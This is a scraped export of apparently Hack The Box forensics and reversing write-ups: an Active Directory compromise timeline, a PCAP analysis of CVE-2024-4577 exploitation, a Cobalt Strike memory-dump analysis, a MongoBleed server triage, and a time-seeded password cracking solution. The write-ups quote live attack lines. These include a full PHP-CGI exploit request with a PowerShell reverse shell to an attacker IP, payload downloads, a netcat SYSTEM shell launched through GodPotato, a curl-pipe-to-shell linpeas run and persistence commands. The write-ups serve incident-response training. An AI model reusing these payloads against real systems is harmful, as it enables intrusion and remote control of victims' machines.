spawned a command shell, which launched PowerShell (PID 4776):\n1Process: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe 2Parent: C:\\Windows\\System32\\cmd.exe (PID 8996) 3Working Directory: C:\\Users\\jody\\Documents\\ 4User: MAIN\\jody T1105\nAt 2025-05-25 03:32:02 UTC, the attacker downloaded a dropper:\n1Invoke-WebRequest -Uri \u0026#34;http://192.168.204.152/UpdatePolicy.exe\u0026#34; -OutFile \u0026#34;C:\\Users\\jody\\Downloads\\UpdatePolicy.exe\u0026#34; C2 Server: 192.168.204.152 T1071.001\nAt 2025-05-25 04:28:17 UTC, reverse shell established:\n1Process: C:\\Users\\jody\\Downloads\\UpdatePolicy.exe (PID 4352) 2Source: 192.168.204.129:49956 3Destination: 192.168.204.152:1337 Discovery # T1087.002\nAt 2025-05-25 03:37:00 UTC, PowerView downloaded for AD enumeration:\n1ScriptBlock ID: 232ebf81-40d1-402f-8910-9ee157bc7dca 2Path: C:\\Users\\jody\\Downloads\\PowerView.ps1 Credential Access # T1558.003\nAt 2025-05-25 03:42:33 UTC, Kerberos TGS requested for service account:\n1Account: jody@MAIN.LOCAL 2Service: sqlsvc (S-1-5-21-620716483-2719109048-3577772375-2115) 3Ticket Encryption: 0x17 (RC4-HMAC) 4Ticket Options: 0x40810000 The attacker successfully cracked the service account credentials offline. T1003.001\nAt 2025-05-25 04:10:43 UTC, Mimikatz executed on Client02 (masqueraded as netdiag.exe):\n1Process: C:\\Users\\jody\\Downloads\\netdiag.exe 2Parent: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe (PID 6304) 3User: NT AUTHORITY\\SYSTEM 4Time: 2025-05-25 04:10:43 UTC Credentials obtained: MAIN\\lucas (cleartext password)\nLateral Movement # T1021.002\nAt 2025-05-25 04:03:47 UTC, lateral movement to Client03 via renamed PsExec:\n1Process: C:\\Windows\\VgYTbFEK.exe 2User: NT AUTHORITY\\SYSTEM 3Time: 2025-05-25 04:05:12 UTC Post-exploitation commands executed at 04:07:57 UTC:\n1whoami # Verify SYSTEM privileges 2net user # Enumerate local accounts (04:08:23 UTC) T1078.002\nAt 2025-05-25 04:12:21 UTC, attacker used stolen credentials:\n1runas /user:Main\\lucas cmd 1Account: sqlsvc 2Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0 3Logon Time: 2025-05-25 04:03:47 UTC 4Error Code: 0x0 (Success) Privilege Escalation # T1003.006\nAt 2025-05-25 04:26:36 UTC, DCSync attack executed against DC01:\n1Subject: MAIN\\lucas (S-1-5-21-620716483-2719109048-3577772375-2114) 2Object Server: DS 3Access List: DS-Replication-Get-Changes-All 4Property GUID: {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} This GUID corresponds to the DS-Replication-Get-Changes-All extended right, allowing replication of KRBTGT hash and all domain credentials.\nDomain Admin Access: 2025-05-25 04:34:01 UTC\nPersistence # T1053.005\nAt 2025-05-25 04:38:53 UTC:\n1Process: C:\\Windows\\System32\\schtasks.exe 2CommandLine: schtasks.exe /create /tn WindowsUpdateCheck /tr C:\\Windows\\System32\\scvhost.exe /sc onstart /ru SYSTEM /f 3User: MAIN\\Administrator 4Parent: C:\\Windows\\System32\\wsmprovhost.exe (WinRM) T1547.001\nAt 2025-05-25 04:40:09 UTC:\n1Process: C:\\Windows\\System32\\reg.exe 2CommandLine: reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v xcvafctr /t REG_SZ /d C:\\Windows\\System32\\scvhost.exe /f 3User: MAIN\\Administrator 4Parent: C:\\Windows\\System32\\wsmprovhost.exe (WinRM) T1543.003\nAt 2025-05-25 04:43:01 UTC:\n1Process: C:\\Windows\\System32\\sc.exe 2CommandLine: sc.exe create WindowsUpdateSvc binPath= C:\\Windows\\System32\\scvhost.exe start= auto 3User: MAIN\\Administrator 4Parent: C:\\Windows\\System32\\wsmprovhost.exe (WinRM) Persistence Payload: C:\\Windows\\System32\\scvhost.exe (typosquatting svchost.exe)\nIndicators of Compromise # Files:\nC:\\Users\\jody\\Downloads\\Profits.docm (SHA256: 1C254F5E03462A7C232265E913162DF2AAE6B5EA5056284512BB32343C0A9507) C:\\Users\\jody\\Downloads\\UpdatePolicy.exe C:\\Users\\jody\\Downloads\\PowerView.ps1 C:\\Users\\jody\\Downloads\\netdiag.exe (Mimikatz) C:\\Windows\\VgYTbFEK.exe (PsExec) C:\\Windows\\System32\\scvhost.exe (Persistence backdoor) Network:\nC2 Server: 192.168.204.152:1337 Victim: 192.168.204.129 Compromised Accounts:\nMAIN\\jody (initial victim) MAIN\\sqlsvc (service account - Kerberoasted) MAIN\\lucas (domain user) MAIN\\Administrator (domain admin) Scheduled Task: WindowsUpdateCheck\nService: WindowsUpdateSvc\nRegistry Run Key: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\xcvafctr\n","date":"January 31, 2026","externalUrl":null,"permalink":"/investigations/htb-ghosttrace/","section":"","summary":"Analyzed Windows Event Logs revealing a complete AD compromise chain: phishing email with macro-enabled document → credential dumping with Mimikatz → lateral movement via PsExec → DCSync attack → domain admin compromise → persistence via scheduled task, service, and registry run key.","title":"HTB-GhostTrace","type":"investigations"},{"content":" Difficulty: Easy OS: Windows Date: 2026-01-31 Description: You are a junior security analyst at a small Japanese cryptocurrency trading company. After detecting suspicious activity on the internal network, you exported a PCAP for further investigation. Analyze this capture to determine whether the environment was compromised and reconstruct the attacker’s actions.\nTL;DR # Analyzed network traffic showing exploitation of CVE-2024-4577 (PHP-CGI argument injection) against a Windows server running PHP 8.1.25. Attacker achieved RCE, established reverse shell on port 4545, then escalated privileges using GodPotato to spawn a SYSTEM-level shell on port 5555.\nAttacker Reconnaissance # Target Information:\n- PHP Version: PHP/8.1.25\n- Victim IP: 192.168.170.130\n- Attacker IP: 192.168.170.128\nOpen ports discovered:\n- 22/tcp - SSH\n- 80/tcp - HTTP\n- 135/tcp - RPC\n- 139/tcp - NetBIOS\n- 443/tcp - HTTPS\n- 445/tcp - SMB\n- 3389/tcp - RDP\n- 5357/tcp - WSDAPI\nInitial Exploitation # I filtered HTTP traffic and observed the attacker (192.168.170.128) testing PHP command execution with \u0026lt;?php system('****');?\u0026gt; payloads. At 2025-01-22 09:47:32, the attacker exploited a CVE-2024-4577 to gain a Reverse Shell to 192.168.170.128 on 4545/tcp\n1POST /?%ADd+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1 2Host: 192.168.170.130 3User-Agent: curl/8.11.1 4Accept: */* 5Content-Length: 569 6Content-Type: application/x-www-form-urlencoded 7 8\u0026lt;?php system(\u0026#39;powershell -NoP -NonI -W Hidden -Exec Bypass -Command \u0026#34;$client = New-Object System.Net.Sockets.TCPClient(\\\u0026#39;192.168.170.128\\\u0026#39;,4545);$stream = $client.GetStream();[byte[]] $buffer = 0..65535|%{0};while(($i = $stream.Read($buffer, 0, $buffer.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($buffer,0,$i);$sendback = (iex $data 2\u0026gt;\u0026amp;1 | Out-String );$sendback2 = $sendback + \\\u0026#39;PS \\\u0026#39;;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\u0026#34;\u0026#39;); ?\u0026gt; CVE-2024-4577 # In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows with certain code pages, Windows \u0026ldquo;Best-Fit\u0026rdquo; behavior replaces characters in command line arguments.\nin this specific exploit:\n1%ADd+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input The soft hyphen (%AD) is converted to a standard hyphen (-) by Windows, resulting in:\n-d allow_url_include=1 - enables remote file inclusion -d auto_prepend_file=php://input - executes code from POST body Privilege Escalation # Following the reverse shell connection on port 4545, the attacker downloaded tools and escalated privileges:\n1PS \u0026gt; wget http://192.168.170.128:9696/nc64.exe -o time.exe 2PS \u0026gt; iwr -uri \u0026#34;https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe\u0026#34; -Outfile TimeProvider.exe 3PS \u0026gt; ./TimeProvider.exe -cmd \u0026#34;time.exe 192.168.170.128 5555 -e cmd\u0026#34; Downloaded nc64.exe as time.exe Downloaded GodPotato-NET4.exe as TimeProvider.exe Used GodPotato to execute Netcat with SYSTEM privileges Established privileged reverse shell on 192.168.170.128:5555 ","date":"January 31, 2026","externalUrl":null,"permalink":"/investigations/htb-packet-_puzzle/","section":"","summary":"Analyzed network traffic showing exploitation of CVE-2024-4577 (PHP-CGI argument injection) against a Windows server running PHP 8.1.25. Attacker achieved RCE, established reverse shell on port 4545, then escalated privileges using GodPotato to spawn a SYSTEM-level shell on port 5555.","title":"HTB-Packet_Puzzle","type":"investigations"},{"content":"","date":"January 31, 2026","externalUrl":null,"permalink":"/tags/t1190/","section":"Tags","summary":"","title":"T1190","type":"tags"},{"content":"","date":"January 30, 2026","externalUrl":null,"permalink":"/tags/cobalt/","section":"Tags","summary":"","title":"Cobalt","type":"tags"},{"content":"","date":"January 30, 2026","externalUrl":null,"permalink":"/tags/cve-2024-14847/","section":"Tags","summary":"","title":"CVE-2024-14847","type":"tags"},{"content":" Difficulty: Easy OS: Windows Date: 2026-01-30 Description:\nA suspicious executable was identified running on one of the compromised endpoints. Initial triage suggests that this process may have been leveraged by the threat actor to establish a foothold on the system. To support further malware analysis and behavioral reconstruction, a user‑mode process dump of the suspected executable has been provided.\nTL;DR # Analyzed two process dumps (notepad.exe and update.exe) revealing a Cobalt Strike Beacon infection. The malware used process injection with reflective DLL loading, communicated with C2 server at 101.10.25.4:8023, and possessed capabilities for privilege escalation, token manipulation, and lateral movement via named pipes.\nInitial Analysis # I received 2 mini dump files:\n1notepad.DMP: Mini DuMP crash report, 15 streams, Wed Nov 5 01:14:37 2025, 0x21826 type 2update.DMP: Mini DuMP crash report, 15 streams, Wed Nov 5 01:11:52 2025, 0x21826 type Injected Process (notepad.dmp) # I ran !analyze -v to reveal OS information:\n1OS_VERSION: 10.0.10240.16384 2OSPLATFORM_TYPE: x64 3OSNAME: Windows 10 I checked for RWX memory regions using !address -f:PAGE_EXECUTE_READWRITE. The first bytes at address b1221a0000 started with MZ, indicating an embedded EXE/DLL:\n1 BaseAddress EndAddress+1 RegionSize Type State Protect Usage 2-------------------------------------------------------------------------------------------------------------------------- 3 b1`20870000 b1`20871000 0`00001000 MEM_PRIVATE MEM_COMMIT PAGE_EXECUTE_READWRITE \u0026lt;unknown\u0026gt; [.H........AQAPRQ] 4 b1`221a0000 b1`221ee000 0`0004e000 MEM_PRIVATE MEM_COMMIT PAGE_EXECUTE_READWRITE \u0026lt;unknown\u0026gt; [MZARUH..H......H] 5 b1`23bd0000 b1`23fd0000 0`00400000 MEM_PRIVATE MEM_COMMIT PAGE_EXECUTE_READWRITE \u0026lt;unknown\u0026gt; [.H....3..E.H....] I examined the threads. Thread with TID 0x3a8 corresponded to the memory page at BaseAddress 20870000:\n10xc28 0x0 notepad!WinMainCRTStartup (00007ff7`8dc23fe0) 20x3a8 0x1 000000b1`20870000 30x5fc 0x2 ntdll!TppWorkerThread (00007fff`47309040) 40x2d0 0x3 ntdll!TppWorkerThread (00007fff`47309040) Thread Analysis # The code was a shellcode stager that unpacked and executed the payload at b1221ee000:\n10:001\u0026gt; u b120870000 L50 2000000b1`20870000 fc cld 3000000b1`20870001 4883e4f0 and rsp,0FFFFFFFFFFFFFFF0h 4000000b1`20870005 e8c8000000 call 000000b1`208700d2 5000000b1`2087000a 4151 push r9 6000000b1`2087000c 4150 push r8 7000000b1`2087000e 52 push rdx 8000000b1`2087000f 51 push rcx 9000000b1`20870010 56 push rsi 10000000b1`20870011 4831d2 xor rdx,rdx 11000000b1`20870014 65488b5260 mov rdx,qword ptr gs:[rdx+60h] 12000000b1`20870019 488b5218 mov rdx,qword ptr [rdx+18h] 13000000b1`2087001d 488b5220 mov rdx,qword ptr [rdx+20h] 14000000b1`20870021 488b7250 mov rsi,qword ptr [rdx+50h] 15000000b1`20870025 480fb74a4a movzx rcx,word ptr [rdx+4Ah] 16000000b1`2087002a 4d31c9 xor r9,r9 17000000b1`2087002d 4831c0 xor rax,rax 18000000b1`20870030 ac lods byte ptr [rsi] 19000000b1`20870031 3c61 cmp al,61h 20000000b1`20870033 7c02 jl 000000b1`20870037 Payload Extraction # I extracted the injected binary from memory address b1221a0000:\n1.writemem c:\\Users\\f\\Desktop\\shellcode.bin b1221a0000 L?4e000 Malicious Process (update.dmp) # I found another executable in this process and extracted it as shellcode1.bin:\n10:000\u0026gt; !address -f:PAGE_EXECUTE_READWRITE 2 3 BaseAddress EndAddress+1 RegionSize Type State Protect Usage 4-------------------------------------------------------------------------------------------------------------------------- 5 0`003a0000 0`003ee000 0`0004e000 MEM_PRIVATE MEM_COMMIT PAGE_EXECUTE_READWRITE \u0026lt;unknown\u0026gt; [MZARUH..H......H] C2 Server IP # I searched for HTTP connections in memory:\n10:000\u0026gt; s -a 0 L?0x7fffffffffffffff \u0026#34;http://\u0026#34; 200000000`0060b8b0 68 74 74 70 3a 2f 2f 31-30 31 2e 31 30 2e 32 35 http://101.10.25 I examined the full URL at address 0060b8b0:\n10:000\u0026gt; db 0060b8b0 L100 200000000`0060b8b0 68 74 74 70 3a 2f 2f 31-30 31 2e 31 30 2e 32 35 http://101.10.25 300000000`0060b8c0 2e 34 3a 38 30 32 33 2f-6a 2e 61 64 00 00 00 00 .4:8023/j.ad.... C2 Server: http://101.10.25.4:8023/j.ad\nShellcode Analysis # I identified the payload as Cobalt Strike Beacon based on strings analysis.\nFramework Identification # 1ascii,10,0x0002C8F0,-,beacon.dll 2ascii,14,0x0003B892,-,beacon.x64.dll 3ascii,16,0x0003B8A1,-,ReflectiveLoader C2 Communication # 1ascii,69,0x0002D3D9,-,IEX (New-Object Net.Webclient).DownloadString(\u0026#39;http://127.0.0.1:%u/\u0026#39;) 2ascii,49,0x0002D491,-,powershell -nop -exec bypass -EncodedCommand \u0026#34;%s\u0026#34; Capabilities # - Process Injection:\nCreateRemoteThread, WriteProcessMemory, ReadProcessMemory, VirtualAllocEx, VirtualProtectEx, SetThreadContext, GetThreadContext\n- Named Pipe Communication: ConnectNamedPipe, CreateNamedPipe, DisconnectNamedPipe, PeekNamedPipe, ImpersonateNamedPipeClient\n- Privilege Escalation: SeDebugPrivilege, SeTcbPrivilege, SeCreateTokenPrivilege, SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege\n- Token Manipulation: ImpersonateLoggedOnUser, CreateProcessAsUser, CreateProcessWithToken, DuplicateTokenEx, AdjustTokenPrivileges\n","date":"January 30, 2026","externalUrl":null,"permalink":"/investigations/htb-crashdump/","section":"","summary":"Analyzed two process dumps (notepad.exe and update.exe) revealing a Cobalt Strike Beacon infection. The malware used process injection with reflective DLL loading, communicated with C2 server at 101.10.25.4:8023, and possessed capabilities for privilege escalation, token manipulation, and lateral movement via named pipes.","title":"HTB-CrashDump","type":"investigations"},{"content":" Difficulty: Super Easy OS: Linux Date: 2026-01-30 Description:\nYou were contacted early this morning to handle a high‑priority incident involving a suspected compromised server. The host, mongodbsync, is a secondary MongoDB server. According to the administrator, it\u0026rsquo;s maintained once a month, and they recently became aware of a vulnerability referred to as MongoBleed. As a precaution, the administrator has provided you with root-level access to facilitate your investigation.\nYou have already collected a triage acquisition from the server using UAC. Perform a rapid triage analysis of the collected artifacts to determine whether the system has been compromised, identify any attacker activity (initial access, persistence, privilege escalation, lateral movement, or data access/exfiltration), and summarize your findings with an initial incident assessment and recommended next steps.\ninitial analysis # What we\u0026rsquo;ve got:\n1. 2├── bodyfile 3│ └── bodyfile.txt 4├── hash_executables 5│ ├── hash_executables.md5 6│ └── hash_executables.sha1 7├── live_response 8│ ├── containers 9│ ├── hardware 10│ ├── network 11│ ├── packages 12│ ├── process 13│ ├── storage 14│ └── system 15├── [root] 16│ ├── etc 17│ ├── home 18│ ├── lib 19│ ├── root 20│ ├── run 21│ ├── snap 22│ ├── usr 23│ └── var 24└── system 25 ├── getcap.txt 26 ├── group_name_unknown_files.txt 27 ├── hidden_directories.txt 28 ├── hidden_files.txt 29 ├── sgid.txt 30 ├── suid.txt 31 ├── user_name_unknown_files.txt 32 ├── world_writable_directories.txt 33 └── world_writable_files.txt CVE explain # 1. What is the CVE ID designated to the MongoDB vulnerability explained in the scenario?\nCVE-2025-14847 allows unauthenticated attackers to leak sensitive heap memory by exploiting a trust issue in how MongoDB Server handles zlib-compressed network messages. This memory can contain sensitive data such as cleartext credentials, API keys, session tokens and personally identifiable information (PII). an attacker only needs network access to the database\u0026rsquo;s default tcp\\27017 port to trigger it\nThis vulnerability affects the following MongoDB versions:\nVersion 8.2: 8.2.0 – 8.2.2\nVersion 8.0: 8.0.0 – 8.0.16\nVersion 7.0: 7.0.0 – 7.0.27\nVersion 6.0: 6.0.0 – 6.0.26\nVersion 5.0: 5.0.0 – 5.0.31\nVersion 4.4: 4.4.0 – 4.4.29\nMongoDB version # 2. What is the version of MongoDB installed on the server that the CVE exploited? analysing logs i found a version of MongoDB\n1\u0026#34;Build Info\u0026#34;,\u0026#34;attr\u0026#34;:{\u0026#34;buildInfo\u0026#34;:{\u0026#34;version\u0026#34;:\u0026#34;8.0.16\u0026#34;,\u0026#34;gitVersion\u0026#34;:\u0026#34;ba70b6a13fda907977110bf46e6c8137f5de48... Atacker IP address # 3. Analyze the MongoDB logs to identify the attacker’s remote IP address used to exploit the CVE. analysing logs i found the attacker\u0026rsquo;s IP address:\n1\u0026#34;msg\u0026#34;:\u0026#34;Connection accepted\u0026#34;,\u0026#34;attr\u0026#34;:{\u0026#34;remote\u0026#34;:\u0026#34;65.0.76.43:35340\u0026#34;,\u0026#34;isLoadBalanced\u0026#34;:false,\u0026#34;uui... Malicious activity # 4. Based on the MongoDB logs, determine the exact date and time the attacker’s exploitation activity began (the earliest confirmed malicious event) exploitation activity began at 2025-12-29 05:25:52, when a server recieve a connection from attacker\u0026rsquo;s.\n1{\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-12-29T05:25:52.743+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;I\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;NETWORK\u0026#34;, \u0026#34;id\u0026#34;:22943, \u0026#34;ctx\u0026#34;:\u0026#34;listener\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;Connection accepted\u0026#34;,\u0026#34;attr\u0026#34;:{\u0026#34;remote\u0026#34;:\u0026#34;65.0.76.43:35340\u0026#34;,\u0026#34;i 5. Using the MongoDB logs, calculate the total number of malicious connections initiated by the attacker.\n1$ grep -c \u0026#34;65.0.76.43\u0026#34; [root]/var/log/mongodb/mongod.log 275260 auth.log # 6. The attacker gained remote access after a series of brute‑force attempts. The attack likely exposed sensitive information, which enabled them to gain remote access. Based on the logs, when did the attacker successfully gain interactive hands-on remote access? at 2025-12-29 05:40:03, the attacker successfully gain access. found in auth.log\n12025-12-29T05:40:03.475659+00:00 ip-172-31-38-170 sshd[39962]: Accepted keyboard-interactive/pam for mongoadmin from 65.0.76.43 port 46062 ssh2 malicious script # 7. Identify the exact command line the attacker used to execute an in‑memory script as part of their privilege‑escalation attempt. In .bash_history of mongoadmin user i found that attacker download a linpeas.sh script.\n1ls -la 2whoami 3curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh 4cd /data 5cd ~ 6ls -al 7cd / 8ls 9cd /var/lib/mongodb/ 10ls -la 11cd ../ 12which zip 13apt install zip 14zip 15cd mongodb/ 16python3 17python3 -m http.server 6969 18exit web server for exfiltration # 8. The attacker was interested in a specific directory and also opened a Python web server, likely for exfiltration purposes. Which directory was the target? the attacker in /var/lib/mongodb deploy a python web server\n","date":"January 30, 2026","externalUrl":null,"permalink":"/investigations/htb-mongobleed/","section":"","summary":"","title":"HTB-MangoBleed","type":"investigations"},{"content":"","date":"January 30, 2026","externalUrl":null,"permalink":"/tags/mini-dump/","section":"Tags","summary":"","title":"Mini Dump","type":"tags"},{"content":"","date":"January 30, 2026","externalUrl":null,"permalink":"/tags/mongodb/","section":"Tags","summary":"","title":"Mongodb","type":"tags"},{"content":"","date":"January 30, 2026","externalUrl":null,"permalink":"/tags/windbg/","section":"Tags","summary":"","title":"WinDBG","type":"tags"},{"content":"","date":"January 29, 2026","externalUrl":null,"permalink":"/tags/elf/","section":"Tags","summary":"","title":"ELF","type":"tags"},{"content":" Difficulty: Medium OS: Linux Date: 2026-01-29 Description:\nA man named Michael Tanz bought 30 bitcoin in 2013 and stored it in his hardware wallet. He set the password for his hardware wallet through a password generator named \u0026ldquo;V1\u0026rdquo;. He remembers that his password is 20 characters long, and consisted of only alphanumeric characters and symbols. Michael however is not exactly sure of the date he generated the password - he knows it was between the 10th and the 11th of December 2013. Can you crack the password and help him recover his bitcoin ?\ninitial analysis # Отримали два файли.\n1$ file * 2decrypt.py: Python script, ASCII text executable 3V1: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7d0ef4ad0fae598a68cba943d3a34c96ad6461d2, for GNU/Linux 4.4.0, not stripped скрипт decrypt.py розшифровує дані з використанням ключа, ключ потрібно дізнатися.\n1from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes 2from cryptography.hazmat.backends import default_backend 3from cryptography.hazmat.primitives import padding 4 5def decrypt_message(encrypted_message, key): 6 try: 7 key = key.ljust(32, b\u0026#39;\\x00\u0026#39;) 8 iv = encrypted_message[:16] 9 ciphertext = encrypted_message[16:] 10 cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend()) 11 decryptor = cipher.decryptor() 12 decrypted_padded_message = decryptor.update(ciphertext) + decryptor.finalize() 13 unpadder = padding.PKCS7(algorithms.AES.block_size).unpadder() 14 decrypted_message = unpadder.update(decrypted_padded_message) + unpadder.finalize() 15 return decrypted_message.decode() 16 except Exception as e: 17 print(f\u0026#34;An error occurred during decryption: {e}\u0026#34;) 18 return None 19 20if __name__ == \u0026#34;__main__\u0026#34;: 21 encrypted_message = bytes.fromhex(\u0026#39;ad24426047b0ffb03b679773664838462a6f00bdcaf0589dd1748e9ed5c568601edc87d974894f9dd9b98cc35535145c494eb0af84c8f78d440a033c91c7de62d506d8cabdc2a10138b95139bbe60e89\u0026#39;) 22 key = input(\u0026#34;Please input your key : \u0026#34;) 23 decrypted_message = decrypt_message(encrypted_message, key.encode()) 24 if decrypted_message: 25 print(f\u0026#34;Decrypted message: {decrypted_message}\u0026#34;) 26 else: 27 print(\u0026#34;Decryption failed or no valid message found.\u0026#34;) by running executable nothing happend:\n1$ ./V1 2Enter len (max 50): 3Include sym? (yes/no):yes 4Include sym? (yes/no): 5Include num? (yes/no): 6Generated password: 7 8$ ./V1 9Enter len (max 50): 10Include sym? (yes/no):no 11Include sym? (yes/no): 12Include num? (yes/no): 13Generated password: reversing with ida # main func do nothing interested. from functions listing i saw unused generate_password() function. so, i started analysis it\nalphabet for key is \u0026quot;abcdefghijklmnopqrstuvwxyz\u0026quot; + \u0026quot;ABCDEFGHIJKLMNOPQRSTUVWXYZ\u0026quot; + \u0026quot;@#$%^\u0026amp;*_+\u0026quot; + \u0026quot;0123456789\u0026quot;:\n1qmemcpy(v14, \u0026#34;abcdefghijklmnopqrstuvwxyz\u0026#34;, 26); 2// ...[snip]... 3std::string::_M_append(\u0026amp;v14, \u0026#34;ABCDEFGHIJKLMNOPQRSTUVWXYZ\u0026#34;, 26); 4// ...[snip]... 5std::string::_M_append(\u0026amp;v14, \u0026#34;!@#$%^\u0026amp;*_+\u0026#34;, 10); 6// ...[snip]... 7std::string::_M_append(\u0026amp;v14, \u0026#34;0123456789\u0026#34;, 10); cryptography using time-based seeds for password generation, whihc is insecure. its becomes feasible to brute-force\n1v6 = localtime(\u0026amp;timer); 2srand( 3100000000 * (v6-\u0026gt;tm_mon + 1) 4+ 1410065408 * (v6-\u0026gt;tm_year + 1900) 5+ 10000 * v6-\u0026gt;tm_hour 6+ v6-\u0026gt;tm_sec 7+ 100 * v6-\u0026gt;tm_min 8+ 1000000 * v6-\u0026gt;tm_mday); the function then generates password character by character. for a2 iterations (password length), it:\npicks random char from alphabet using rand() % charset_length appends it to the output string 1if ( a2 \u0026gt; 0 ) 2{ 3 for ( i = 0; i != a2; ++i ) 4 { 5 v9 = *(v14 + rand() % v15); // pick random char 6 // ... string manipulation to append v9 to result ... 7 *(*a1 + v10) = v9; // add char to password 8 a1[1] = v11; // update length 9 *(*a1 + v10 + 1) = 0; // null terminator 10 } 11} exploitation strategy # since password generation is deterministic (same timestamp = same password), i can:\n- iterate through all timestamps in dec 10-11, 2013\n- for each timestamp, calculate the seed value\n- generate 20-char password using C\u0026rsquo;s rand() with that seed\n- attempt AES decryption with generated password\nrecreated the seed calculation and password generation logic in python using ctypes to call C\u0026rsquo;s srand()/rand():\n1from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes 2from cryptography.hazmat.backends import default_backend 3from cryptography.hazmat.primitives import padding 4import ctypes 5from datetime import datetime, timedelta 6 7def decrypt_message(encrypted_message, key): 8 try: 9 key = key.ljust(32, b\u0026#39;\\x00\u0026#39;) 10 iv = encrypted_message[:16] 11 ciphertext = encrypted_message[16:] 12 cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend()) 13 decryptor = cipher.decryptor() 14 decrypted_padded_message = decryptor.update(ciphertext) + decryptor.finalize() 15 unpadder = padding.PKCS7(algorithms.AES.block_size).unpadder() 16 decrypted_message = unpadder.update(decrypted_padded_message) + unpadder.finalize() 17 return decrypted_message.decode() 18 except Exception as e: 19 return None 20 21def pwd_gen(length, seed_value): 22 charset = \u0026#34;abcdefghijklmnopqrstuvwxyz\u0026#34; + \u0026#34;ABCDEFGHIJKLMNOPQRSTUVWXYZ\u0026#34; + \u0026#34;!@#$%^\u0026amp;*_+\u0026#34; + \u0026#34;0123456789\u0026#34; 23 24 libc = ctypes.CDLL(None) 25 libc.srand(seed_value) 26 27 pwd = \u0026#34;\u0026#34; 28 for _ in range(length): 29 rand_val = libc.rand() 30 pwd += charset[rand_val % len(charset)] 31 32 return pwd 33 34def seed_gen(year, month, day, hour, minute, second): 35 return (100000000 * (month + 1) + 36 1410065408 * (year + 1900) + 37 10000 * hour + 38 second + 39 100 * minute + 40 1000000 * day) 41 42 43encrypted_message = bytes.fromhex(\u0026#39;ad24426047b0ffb03b679773664838462a6f00bdcaf0589dd1748e9ed5c568601edc87d974894f9dd9b98cc35535145c494eb0af84c8f78d440a033c91c7de62d506d8cabdc2a10138b95139bbe60e89\u0026#39;) 44 45start = datetime(2013, 12, 10, 0, 0, 0) 46end = datetime(2013, 12, 11, 23, 59, 59) 47 48c = start 49count = 0 50 51while c \u0026lt;= end: 52 seed = seed_gen( 53 c.year - 1900, 54 c.month - 1, 55 c.day, 56 c.hour, 57 c.minute, 58 c.second 59 ) 60 61 pwd = pwd_gen(20, seed) 62 63 d = decrypt_message(encrypted_message, pwd.encode()) 64 65 if d and d.isprintable(): 66 print(f\u0026#34;Password: {pwd}\u0026#34;) 67 print(f\u0026#34;Decrypted message: {d}\u0026#34;) 68 break 69 70 count += 1 71 if count % 10000 == 0: 72 print(f\u0026#34;Checked {count} timestamps...\u0026#34;) 73 74 c += timedelta(seconds=1) 1$ python3 dec.py 2Checked 10000 timestamps... 3Checked 20000 timestamps... 4Checked 30000 timestamps... 5Checked 40000 timestamps... 6Checked 50000 timestamps... 7Checked 60000 timestamps... 8Checked 70000 timestamps... 9Checked 80000 timestamps... 10Checked 90000 timestamps... 11Checked 100000 timestamps... 12Checked 110000 timestamps... 13Checked 120000 timestamps... 14Checked 130000 timestamps... 15Password: eWXtk*Oe%j5cof7Od08G 16Decrypted message: d 30 Bitcoins! , HTB{T1me_0n_the_B1t5_1386784885} ","date":"January 29, 2026","externalUrl":null,"permalink":"/investigations/htb-wayback/","section":"","summary":"","title":"HTB-Wayback","type":"investigations"},{"content":"","date":"January 29, 2026","externalUrl":null,"permalink":"/tags/srand/","section":"Tags","summary":"","title":"Srand","type":"tags"},{"content":" Difficulty: Easy OS: Windows Date: 2026-01-28 Description:\nThe Client is in full control. Bypass the authentication and read the key to get the Flag.\ninitial analysis # 1$ file Bypass.exe 2Bypass.exe: PE32 executable for MS Windows 4.00 (console), Intel i386 Mono/.Net assembly, 3 sections 1C:\\Users\\f\\Desktop\u0026gt;Bypass.exe 2Enter a username: hi 3Enter a password: hi 4Wrong username and/or password 5Enter a username: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 6Enter a password: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 7Wrong username and/or password 8Enter a username: reversing with dnspy # Код отримує доступ до вбудованого ресурсу з іменем \u0026quot;0\u0026quot;. ці дані передаються у метод 3 класу 7 it\u0026rsquo;s AES-CBC decrytprion where key is 32 bytes and iv is 16 byte\n1byte[] array = new byte[rijndaelManaged.Key.Length]; 2byte[] array2 = new byte[rijndaelManaged.IV.Length]; 3memoryStream.Read(array, 0, array.Length); 4memoryStream.Read(array2, 0, array2.Length); solution # 1from Crypto.Cipher import AES 2from Crypto.Util.Padding import unpad 3 4with open(\u0026#34;0.bin\u0026#34;, \u0026#34;rb\u0026#34;) as f: 5 d = f.read() 6 7k_s = 32 8iv_s = 16 9 10key = d[:k_s] 11iv = d[k_s:k_s + iv_s] 